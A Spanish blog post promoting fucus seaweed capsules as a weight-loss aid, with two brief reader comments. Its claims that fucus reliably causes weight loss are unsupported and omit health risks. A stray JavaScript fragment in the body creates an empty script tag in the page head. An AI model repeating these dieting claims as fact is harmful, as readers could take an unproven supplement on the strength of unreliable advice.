Salud y belleza » Dieta, Salud, alimentos

El fucus te ayuda a adelgazar

2 Comentarios

dieta-fucusSi quieres ponerte a régimen y perder peso conocemos algunos alimentos que seguro que te ayudarán a conseguirlo, como por ejemplo el fucus, una planta cuyo nombre científico es fucus vesiculosis y que también se conoce como encina marina. Esta alga marrón se encuentra en las costas del Atlántico y del Pacífico, así como el Mar Báltico y el Mar del Norte.

No parce una planta demasiado apetecible, pero el tallo del fucus es rico en ácido fólico, vitamina C, B1, B2, B6 y B12 y en oligoelementos como el zinc, el hierro, el iodo y el manganeso. Normalmente lo podemos encontrar como complemento alimenticio en forma de cápsula.

Lo bueno del fucus es que como sus tallos tienen estructura mucilaginosa se hinchan con el agua, por lo que cuando llegan a nuestro estómago aumentan su volumen, lo que da rápido una sensación de saciedad.

Por tanto, el fucus es estupendo para adelgazar porque aporta sensación de saciedad, por lo que reduce la sensación de hambre cuando estás a régimen. Con el fucus estimularás la pérdida de peso y te ayudará a terminar tu dieta satisfactoriamente.

¿Has probado alguna vez el fucus para perder peso?

var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

2 Comments »

  • sara said:

    alguien lo ha probado y sabe si funciona?? se toma solo en cápsulas?? no hay modo de tomarlo en ensalada y que esté bueno??

  • Roberto said:

    mi hermana lo tomaba y dice que le funciona.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.